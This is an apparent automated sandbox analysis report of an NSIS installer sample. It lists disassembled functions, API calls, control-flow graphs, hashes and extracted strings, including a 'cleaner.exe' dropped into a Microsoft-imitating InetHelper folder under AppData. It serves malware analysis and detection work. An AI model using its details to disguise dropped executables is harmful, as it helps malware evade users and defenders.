                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                                                              • String ID: *:o$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$HA$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                              • API String ID: 2803837635-1291305336
                                                                                                                                                                                                              • Opcode ID: e6cc7feb225d5f91d4cb60b2c7bd5eae8f554926f74471ae7b4f53b82ba7c1c2
                                                                                                                                                                                                              • Instruction ID: d25a53c4d11647cbbad2ea8e7a2610e0d6e301d01d0d9af5663e5c20e349ab0e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e6cc7feb225d5f91d4cb60b2c7bd5eae8f554926f74471ae7b4f53b82ba7c1c2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E8610331D01205ABDB209FA4DD85B9E7BA8AB04316F24417BF904F72D1D77C8E808B9D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 0040640A Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209stringCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 281 40640a-406415 282 406417-406426 281->282 283 406428-40643e 281->283 282->283 284 406444-406451 283->284 285 406656-40665c 283->285 284->285 286 406457-40645e 284->286 287 406662-40666d 285->287 288 406463-406470 285->288 286->285 290 406678-406679 287->290 291 40666f-406673 call 4063e8 287->291 288->287 289 406476-406482 288->289 292 406643 289->292 293 406488-4064c6 289->293 291->290 297 406651-406654 292->297 298 406645-40664f 292->298 295 4065e6-4065ea 293->295 296 4064cc-4064d7 293->296 301 4065ec-4065f2 295->301 302 40661d-406621 295->302 299 4064f0 296->299 300 4064d9-4064de 296->300 297->285 298->285 308 4064f7-4064fe 299->308 300->299 305 4064e0-4064e3 300->305 306 406602-40660e call 4063e8 301->306 307 4065f4-406600 call 40632f 301->307 303 406630-406641 lstrlenW 302->303 304 406623-40662b call 40640a 302->304 303->285 304->303 305->299 310 4064e5-4064e8 305->310 319 406613-406619 306->319 307->319 312 406500-406502 308->312 313 406503-406505 308->313 310->299 315 4064ea-4064ee 310->315 312->313 317 406540-406543 313->317 318 406507-40652e call 4062b6 313->318 315->308 321 406553-406556 317->321 322 406545-406551 GetSystemDirectoryW 317->322 329 406534-40653b call 40640a 318->329 330 4065ce-4065d1 318->330 319->303 320 40661b 319->320 325 4065de-4065e4 call 40667c 320->325 327 4065c1-4065c3 321->327 328 406558-406566 GetWindowsDirectoryW 321->328 326 4065c5-4065c9 322->326 325->303 326->325 332 4065cb 326->332 327->326 331 406568-406572 327->331 328->327 329->326 330->325 335 4065d3-4065d9 lstrcatW 330->335 337 406574-406577 331->337 338 40658c-4065a2 SHGetSpecialFolderLocation 331->338 332->330 335->325 337->338 340 406579-406580 337->340 341 4065a4-4065bb SHGetPathFromIDListW CoTaskMemFree 338->341 342 4065bd 338->342 343 406588-40658a 340->343 341->326 341->342 342->327 343->326 343->338
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",00002000), ref: 0040654B
                                                                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",00002000,00000000,0043E708,?,00405487,0043E708,00000000), ref: 0040655E
                                                                                                                                                                                                              • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,0043E708,?,00405487,0043E708,00000000), ref: 0040659A
                                                                                                                                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"), ref: 004065A8
                                                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                                                                                                                                                                              • lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                                                                                                                                                                              • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",00000000,0043E708,?,00405487,0043E708,00000000), ref: 00406631
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                                                                                              • String ID: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                              • API String ID: 717251189-2610422173
                                                                                                                                                                                                              • Opcode ID: 23f28206d8b90664ce3613e71128f54d67ce4c932df2e69045dd5148352027ec
                                                                                                                                                                                                              • Instruction ID: 4ff03c26a92b18a500a2dba0a5346c99a5613c7aa05bf40b8fc1f2faf6c00e92
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 23f28206d8b90664ce3613e71128f54d67ce4c932df2e69045dd5148352027ec
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 59612271A00101ABDF209F64DD85AAE37A5AF50314F22813FE507BA2D1EB3D8EA1C75D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 0040176F Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 145stringtimeCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 408 40176f-401794 call 402c41 call 405d34 413 401796-40179c call 4063e8 408->413 414 40179e-4017b0 call 4063e8 call 405cbd lstrcatW 408->414 419 4017b5-4017b6 call 40667c 413->419 414->419 423 4017bb-4017bf 419->423 424 4017c1-4017cb call 40672b 423->424 425 4017f2-4017f5 423->425 433 4017dd-4017ef 424->433 434 4017cd-4017db CompareFileTime 424->434 426 4017f7-4017f8 call 405eb9 425->426 427 4017fd-401819 call 405ede 425->427 426->427 435 40181b-40181e 427->435 436 40188d-4018b6 call 405450 call 4031d6 427->436 433->425 434->433 437 401820-40185e call 4063e8 * 2 call 40640a call 4063e8 call 405a4e 435->437 438 40186f-401879 call 405450 435->438 450 4018b8-4018bc 436->450 451 4018be-4018ca SetFileTime 436->451 437->423 470 401864-401865 437->470 448 401882-401888 438->448 453 402ace 448->453 450->451 452 4018d0-4018db FindCloseChangeNotification 450->452 451->452 455 4018e1-4018e4 452->455 456 402ac5-402ac8 452->456 458 402ad0-402ad4 453->458 459 4018e6-4018f7 call 40640a lstrcatW 455->459 460 4018f9-4018fc call 40640a 455->460 456->453 467 401901-4022fc call 405a4e 459->467 460->467 467->456 467->458 470->448 472 401867-401868 470->472 472->438
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                                                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,InetHelper,InetHelper,00000000,00000000,InetHelper,004C9000,?,?,00000031), ref: 004017D5
                                                                                                                                                                                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00002000,00403576,00468240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                                                                                                                • Part of subcall function 00405450: lstrcatW.KERNEL32(0043E708,00402F08), ref: 004054AB
                                                                                                                                                                                                                • Part of subcall function 00405450: SetWindowTextW.USER32(0043E708,0043E708), ref: 004054BD
                                                                                                                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                              • String ID: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"$InetHelper
                                                                                                                                                                                                              • API String ID: 1941528284-4078307097
                                                                                                                                                                                                              • Opcode ID: 09b218e5e7aa004988234aef99607d2b4dfa3534dd7724c6f1d49ddbe7db769c
                                                                                                                                                                                                              • Instruction ID: ededab686cc318fc7e7b90f4c09e4a826d398c1608d56966c744d50d12e1e378
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 09b218e5e7aa004988234aef99607d2b4dfa3534dd7724c6f1d49ddbe7db769c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4841B571900518BADF107BA5CD85DAF3679EF4532DB20423FF416B10E2DB3C8A929A6D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 004032DE Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 101COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 474 4032de-403306 GetTickCount 475 403436-40343e call 402e8e 474->475 476 40330c-403337 call 40345d SetFilePointer 474->476 481 403440-403444 475->481 482 40333c-40334e 476->482 483 403350 482->483 484 403352-403360 call 403447 482->484 483->484 487 403366-403372 484->487 488 403428-40342b 484->488 489 403378-40337e 487->489 488->481 490 403380-403386 489->490 491 4033a9-4033c5 call 406943 489->491 490->491 492 403388-4033a8 call 402e8e 490->492 497 403431 491->497 498 4033c7-4033cf 491->498 492->491 499 403433-403434 497->499 500 4033d1-4033d9 call 405f90 498->500 501 4033f2-4033f8 498->501 499->481 504 4033de-4033e0 500->504 501->497 503 4033fa-4033fc 501->503 503->497 505 4033fe-403411 503->505 506 4033e2-4033ee 504->506 507 40342d-40342f 504->507 505->482 508 403417-403426 SetFilePointer 505->508 506->489 509 4033f0 506->509 507->499 508->475 509->505
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 004032F2
                                                                                                                                                                                                                • Part of subcall function 0040345D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 00403325
                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(006F3A2A,00000000,00000000,004266D0,00004000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000), ref: 00403420
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • *:o, xrefs: 004032E1, 004033FE
                                                                                                                                                                                                              • timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this, xrefs: 00403337, 004033D2
                                                                                                                                                                                                              • 5=B, xrefs: 004033AE, 004033C7
                                                                                                                                                                                                              • HA, xrefs: 004033A9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FilePointer$CountTick
                                                                                                                                                                                                              • String ID: *:o$5=B$HA$timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this
                                                                                                                                                                                                              • API String ID: 1092082344-71510955
                                                                                                                                                                                                              • Opcode ID: d6b178faf7be8bed1ce1700d2338eadcdcd7a4db5cb59746dbf71c5feed9a6d3
                                                                                                                                                                                                              • Instruction ID: fd4332e341476289c3f76e81f79fa789cc737db0b0adfb813ccc5192894bdc6c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d6b178faf7be8bed1ce1700d2338eadcdcd7a4db5cb59746dbf71c5feed9a6d3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C231B171600211DBC7209F26FE8496A3BA8F7643567C9423BEC40B62E0CB385D11DB1E
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00406752 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 510 406752-406772 GetSystemDirectoryW 511 406774 510->511 512 406776-406778 510->512 511->512 513 406789-40678b 512->513 514 40677a-406783 512->514 516 40678c-4067bf wsprintfW LoadLibraryExW 513->516 514->513 515 406785-406787 514->515 515->516
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 004067A4
                                                                                                                                                                                                              • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004067B8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                              • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                                                              • API String ID: 2200240437-1946221925
                                                                                                                                                                                                              • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                                                                                                                              • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00406943 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 198COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 517 406943-406966 518 406970-406973 517->518 519 406968-40696b 517->519 521 406976-40697f 518->521 520 407390-407394 519->520 522 406985 521->522 523 40738d 521->523 524 406a31-406a35 522->524 525 406aa1-406aa5 522->525 526 40698c-406990 522->526 527 406acc-407173 522->527 523->520 528 4072e1-4072eb 524->528 529 406a3b-406a54 524->529 532 4072f0-4072fa 525->532 533 406aab-406abf 525->533 530 406996-4069a3 526->530 531 407378-40738b 526->531 538 407175-40718b 527->538 539 40718d-4071a3 527->539 528->531 535 406a57-406a5b 529->535 530->523 536 4069a9-4069ef 530->536 531->520 532->531 537 406ac2-406aca 533->537 535->524 541 406a5d-406a63 535->541 542 4069f1-4069f5 536->542 543 406a17-406a19 536->543 537->525 537->527 540 4071a6-4071ad 538->540 539->540 544 4071d4-4071e0 540->544 545 4071af-4071b3 540->545 546 406a65-406a6c 541->546 547 406a8d-406a9f 541->547 548 406a00-406a0e GlobalAlloc 542->548 549 4069f7-4069fa GlobalFree 542->549 550 406a27-406a2f 543->550 551 406a1b-406a25 543->551 544->521 552 407362-40736c 545->552 553 4071b9-4071d1 545->553 555 406a77-406a87 GlobalAlloc 546->555 556 406a6e-406a71 GlobalFree 546->556 547->537 548->523 557 406a14 548->557 549->548 550->535 551->550 551->551 552->531 553->544 555->523 555->547 556->555 557->543
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this, xrefs: 00406943
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this
                                                                                                                                                                                                              • API String ID: 0-1897978588
                                                                                                                                                                                                              • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                                                                                                                              • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00402598 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69stringCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 558 402598-4025aa 559 4025c7-4025ca 558->559 560 4025ac-4025c5 call 402c1f 558->560 562 4025fb-402608 call 402c41 lstrlenW 559->562 563 4025cc-4025f9 call 402c41 WideCharToMultiByte lstrlenA 559->563 569 40260a-402610 560->569 562->569 563->569 570 402616-402621 call 406348 569->570 571 40288b-402ad4 569->571 576 402623-402626 570->576 577 402637-402640 call 405f90 570->577 576->577 579 402628-402631 call 405fbf 576->579 582 402645 577->582 579->571 579->577 582->571
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",000000FF,0040E5D8,00002000,?,?,00000021), ref: 004025E8
                                                                                                                                                                                                              • lstrlenA.KERNEL32(0040E5D8,?,?,"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",000000FF,0040E5D8,00002000,?,?,00000021), ref: 004025F3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe", xrefs: 004025E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharMultiWidelstrlen
                                                                                                                                                                                                              • String ID: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"
                                                                                                                                                                                                              • API String ID: 3109718747-1638566638
                                                                                                                                                                                                              • Opcode ID: 79fe6349def6cc650f231a14f4b83c981983240ca263c31f9bdf3a4ba712873e
                                                                                                                                                                                                              • Instruction ID: 8a54b08748082a87d090de781de000be55bd47bcbf4860f745c9e519e4ad5c94
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 79fe6349def6cc650f231a14f4b83c981983240ca263c31f9bdf3a4ba712873e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66110872A05201BADB146BF18E8DA9F7664AF44398F20483BF502F21D1DDFC89815B5D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 004023E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 584 4023e4-402415 call 402c41 * 2 call 402cd1 591 402ac5-402ad4 584->591 592 40241b-402425 584->592 593 402427-402434 call 402c41 lstrlenW 592->593 594 402438-40243b 592->594 593->594 596 40243d-40244e call 402c1f 594->596 597 40244f-402452 594->597 596->597 601 402463-402477 RegSetValueExW 597->601 602 402454-40245e call 4031d6 597->602 606 402479 601->606 607 40247c-40255d RegCloseKey 601->607 602->601 606->607 607->591
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",00000023,00000011,00000002), ref: 0040242F
